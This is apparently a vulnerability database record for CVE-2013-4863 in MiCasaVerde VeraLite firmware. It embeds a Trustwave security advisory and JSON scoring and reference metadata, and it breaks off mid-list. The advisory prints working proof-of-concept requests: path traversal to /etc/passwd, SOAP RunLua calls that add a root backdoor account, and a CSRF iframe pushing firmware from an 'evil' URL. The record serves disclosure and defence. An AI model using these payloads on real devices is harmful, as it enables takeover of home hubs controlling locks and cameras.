VAR-202001-1149
Vulnerability from variot - Updated: 2023-12-18 12:09The HomeAutomationGateway service in MiCasaVerde VeraLite with firmware 1.5.408 allows (1) remote attackers to execute arbitrary Lua code via a RunLua action in a request to upnp/control/hag on port 49451 or (2) remote authenticated users to execute arbitrary Lua code via a RunLua action in a request to port_49451/upnp/control/hag. MiCasaVerde VeraLite Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A remote identity bypass vulnerability exists in Mi Casa Verde VeraLite. An attacker could exploit the vulnerability to bypass the authentication mechanism and gain unauthorized access to the affected device, helping to initiate further attacks. This may lead to further attacks. Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite
Published: 08/01/13 Version: 1.0
Vendor: MiCasaVerde (http://www.micasaverde.com/) Product: VeraLite Version affected: 1.5.408
Product description: The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product which centralizes control over home automation devices such as door locks, window blinds, security cameras, smoke detectors, HVAC systems, lights, etc.
Finding 1: Path Traversal *Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4861 CWE: CWE-23
The VeraLite has a path traversal vulnerability allowing for disclosure of arbitrary files. This allows an attacker to retrieve the contents of any file on the system such as the /etc/passwd file which contains the hashed root password as well as the tech support remote access password if remote access has been configured.
A proof of concept can be run against a VeraLite by using the following URL: GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd
On a newly unboxed VeraLite, this shouldn't work as the first part of the path used by the script doesn't exist, but the directory which must exist for exploitation to work correctly can be created by using the store_file.sh script, like so:
GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test
This attack can also be launched through the Internet-based control panel at cp.mios.com when logged in as either an admin or guest level account.
Finding 2: Insufficient Authorization Checks *Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4862 CWE: CWE-285
The VeraLite makes a distinction between Administrator and Guest users such that Guest users should not be able to make changes to the configuration of the system. There are several functionalities included in the VeraLite console available to Guest level users which can be used to escalate privileges.
A) Firmware update - This allows a guest to push custom firmware to the unit and can allow for full compromise of the device.
A proof of concept can be seen using the following URL: GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs
B) Settings backup - This allows a guest to obtain copies of various sensitive files, including the lighttpd.users file which contains hashed cp.mios.com passwords, and the passwd file which contains the hashed root password.
GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1
C) Test Luup code (Lua) - This allows a guest to run Lua code on the VeraLite as root. A backdoor account can be added with the following POST request:
POST /port_49451/upnp/control/hag HTTP/1.1 Host: A.B.C.D Accept: text/javascript, text/html, application/xml, text/xml, / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")
Finding 3: Insufficient Authentication Checks *Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4863 CWE: CWE-287
The VeraLite exposes UPnP functionality which allows for Lua code to be run as root from the LAN without authentication using the RunLua action in the HomeAutomationGateway service of the HomeAutomationGateway device. A backdoor account can be added with the following POST request to port 49451:
POST /upnp/control/hag HTTP/1.1 Host: A.B.C.D:49451 Accept: text/javascript, text/html, application/xml, text/xml, / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")
Finding 4: Server-Side Request Forgery *Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4864 CWE: CWE-918
The VeraLite will make HTTP requests on behalf of a user using the /cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of trustwave.com is as follows:
GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com
This allows an attacker to bypass firewall controls, use the VeraLite as a proxy
Finding 5: Cross-Site Request Forgery *Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4865 CWE: CWE-352
The VeraLite does not implement any defense against cross-site request forgery. A proof of concept as seen below can cause a Vera user to update their firmware using a custom firmware URL:
If this PoC was embedded in any web page a targeted user visited, an attacker would be able to make arbitrary changes to the firmware on the device, allowing the potential for remote root access.
Vendor Response: "...the "vulnerabilities" you referred to were deliberate design decisions because that's what the customers in this particular channel (ie Vera retail) want. As you can see we have an open forum to discuss this, and very people object to leaving Vera open. So we are not able to lock down the gateway, and effectively break the systems of many customers who rely on the open system to run their own scripts and plugins."
Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of access control lists and proper network segmentation.
Revision History: 04/23/13 - Vulnerability disclosed to vendor 06/04/13 - Vendor confirms they will not fix 08/01/13 - Advisory published
References 1. http://www.micasaverde.com/
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1149",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "veralite",
"scope": "eq",
"trust": 1.0,
"vendor": "micasaverde",
"version": "1.5.408"
},
{
"model": "casa verde veralite",
"scope": "eq",
"trust": 0.9,
"vendor": "mi",
"version": "1.5.408"
},
{
"model": "veralite",
"scope": "eq",
"trust": 0.8,
"vendor": "vera control",
"version": null
},
{
"model": "veralite",
"scope": "eq",
"trust": 0.8,
"vendor": "vera control",
"version": "veralite firmware 1.5.408"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "BID",
"id": "61591"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:micasaverde:veralite_firmware:1.5.408:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:micasaverde:veralite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4863"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Crowley of Trustwave SpiderLabs",
"sources": [
{
"db": "BID",
"id": "61591"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4863",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-4863",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-12045",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-4863",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-4863",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-12045",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201308-038",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-4863",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The HomeAutomationGateway service in MiCasaVerde VeraLite with firmware 1.5.408 allows (1) remote attackers to execute arbitrary Lua code via a RunLua action in a request to upnp/control/hag on port 49451 or (2) remote authenticated users to execute arbitrary Lua code via a RunLua action in a request to port_49451/upnp/control/hag. MiCasaVerde VeraLite Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A remote identity bypass vulnerability exists in Mi Casa Verde VeraLite. An attacker could exploit the vulnerability to bypass the authentication mechanism and gain unauthorized access to the affected device, helping to initiate further attacks. This may lead to further attacks. Trustwave SpiderLabs Security Advisory TWSL2013-019:\nMultiple Vulnerabilities in MiCasaVerde VeraLite\n\nPublished: 08/01/13\nVersion: 1.0\n\nVendor: MiCasaVerde (http://www.micasaverde.com/)\nProduct: VeraLite\nVersion affected: 1.5.408\n\nProduct description:\nThe MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product\nwhich centralizes control over home automation devices such as door locks,\nwindow blinds, security cameras, smoke detectors, HVAC systems, lights,\netc. \n\nFinding 1: Path Traversal\n*****Credit: Daniel Crowley of Trustwave SpiderLabs\nCVE: CVE-2013-4861\nCWE: CWE-23\n\nThe VeraLite has a path traversal vulnerability allowing for disclosure of\narbitrary files. This allows an attacker to retrieve the contents of any\nfile on the system such as the /etc/passwd file which contains the hashed\nroot password as well as the tech support remote access password if remote\naccess has been configured. \n\nA proof of concept can be run against a VeraLite by using the following URL:\nGET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd\n\nOn a newly unboxed VeraLite, this shouldn\u0027t work as the first part of the\npath used by the script doesn\u0027t exist, but the directory which must exist\nfor exploitation to work correctly can be created by using the\nstore_file.sh script, like so:\n\nGET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test\n\nThis attack can also be launched through the Internet-based control panel\nat cp.mios.com when logged in as either an admin or guest level account. \n\nFinding 2: Insufficient Authorization Checks\n*****Credit: Daniel Crowley of Trustwave SpiderLabs\nCVE: CVE-2013-4862\nCWE: CWE-285\n\nThe VeraLite makes a distinction between Administrator and Guest users such\nthat Guest users should not be able to make changes to the configuration of\nthe system. There are several functionalities included in the VeraLite\nconsole available to Guest level users which can be used to escalate\nprivileges. \n\nA) Firmware update - This allows a guest to push custom firmware to the\nunit and can allow for full compromise of the device. \n\nA proof of concept can be seen using the following URL:\nGET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs\n\nB) Settings backup - This allows a guest to obtain copies of various\nsensitive files, including the lighttpd.users file which contains hashed\ncp.mios.com passwords, and the passwd file which contains the hashed root\npassword. \n\nGET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1\n\nC) Test Luup code (Lua) - This allows a guest to run Lua code on the\nVeraLite as root. A backdoor account can be added with the following POST\nrequest:\n\nPOST /port_49451/upnp/control/hag HTTP/1.1\nHost: A.B.C.D\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.7\nContent-Type: text/xml;charset=UTF-8\nMIME-Version: 1.0\nSOAPACTION: \"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\"\nContent-Length: 311\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\u003cs:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\u003e\u003cs:Body\u003e \u003cu:RunLua xmlns:u=\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\"\u003e \u003cDeviceNum\u003e\u003c/DeviceNum\u003e \u003cCode\u003eos.execute(\u0026quot;echo \u0027backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash\u0027 %3e%3e /etc/passwd\u0026quot;)\u003c/Code\u003e \u003c/u:RunLua\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\nFinding 3: Insufficient Authentication Checks\n*****Credit: Daniel Crowley of Trustwave SpiderLabs\nCVE: CVE-2013-4863\nCWE: CWE-287\n\nThe VeraLite exposes UPnP functionality which allows for Lua code to be run\nas root from the LAN without authentication using the RunLua action in the\nHomeAutomationGateway service of the HomeAutomationGateway device. A\nbackdoor account can be added with the following POST request to port\n49451:\n\nPOST /upnp/control/hag HTTP/1.1\nHost: A.B.C.D:49451\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.7\nContent-Type: text/xml;charset=UTF-8\nMIME-Version: 1.0\nSOAPACTION: \"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\"\nContent-Length: 311\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\u003cs:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\u003e\u003cs:Body\u003e \u003cu:RunLua xmlns:u=\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\"\u003e \u003cDeviceNum\u003e\u003c/DeviceNum\u003e \u003cCode\u003eos.execute(\u0026quot;echo \u0027backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash\u0027 %3e%3e /etc/passwd\u0026quot;)\u003c/Code\u003e \u003c/u:RunLua\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\nFinding 4: Server-Side Request Forgery\n*****Credit: Daniel Crowley of Trustwave SpiderLabs\nCVE: CVE-2013-4864\nCWE: CWE-918\n\nThe VeraLite will make HTTP requests on behalf of a user using the\n/cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of\ntrustwave.com is as follows:\n\nGET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com\n\nThis allows an attacker to bypass firewall controls, use the VeraLite as a proxy\n\n\nFinding 5: Cross-Site Request Forgery\n*****Credit: Daniel Crowley of Trustwave SpiderLabs\nCVE: CVE-2013-4865\nCWE: CWE-352\n\nThe VeraLite does not implement any defense against cross-site request\nforgery. A proof of concept as seen below can cause a Vera user to update\ntheir firmware using a custom firmware URL:\n\n\u003chtml\u003e\n\u003cbody\u003e\n\u003ciframe src=\"http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs\" width=\"1\" height=\"1\"\u003e\n\u003c/iframe\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nIf this PoC was embedded in any web page a targeted user visited, an\nattacker would be able to make arbitrary changes to the firmware on the\ndevice, allowing the potential for remote root access. \n\nVendor Response:\n\"...the \"vulnerabilities\" you referred to were deliberate design decisions\nbecause that\u0027s what the customers in this particular channel (ie Vera\nretail) want. As you can see we have an open forum to discuss this, and\nvery people object to leaving Vera open. So we are not able to lock down\nthe gateway, and effectively break the systems of many customers who rely\non the open system to run their own scripts and plugins.\"\n\nRemediation Steps:\nNo official patch is available. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of access control lists and proper\nnetwork segmentation. \n\nRevision History:\n04/23/13 - Vulnerability disclosed to vendor\n06/04/13 - Vendor confirms they will not fix\n08/01/13 - Advisory published\n\n\nReferences\n1. http://www.micasaverde.com/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "BID",
"id": "61591"
},
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "PACKETSTORM",
"id": "122654"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40589",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-4863"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4863",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "122654",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "27286",
"trust": 1.7
},
{
"db": "BID",
"id": "61591",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-12045",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "40589",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-4863",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "BID",
"id": "61591"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "PACKETSTORM",
"id": "122654"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"id": "VAR-202001-1149",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
}
],
"trust": 1.35
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
}
]
},
"last_update_date": "2023-12-18T12:09:30.294000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://support.getvera.com/hc/en-us"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/xuguowong/mirai-mal "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Incorrect authentication (CWE-287) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/122654/micasaverde-veralite-1.5.408-traversal-authorization-csrf-disclosure.html"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/27286"
},
{
"trust": 1.7,
"url": "https://www3.trustwave.com/spiderlabs/advisories/twsl2013-019.txt"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4863"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/61591"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/aug/17"
},
{
"trust": 0.3,
"url": "http://www.micasaverde.com/controllers/veralite/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/40589/"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\""
},
{
"trust": 0.1,
"url": "http://a.b.c.d/cgi-bin/cmh/backup.sh?external=1"
},
{
"trust": 0.1,
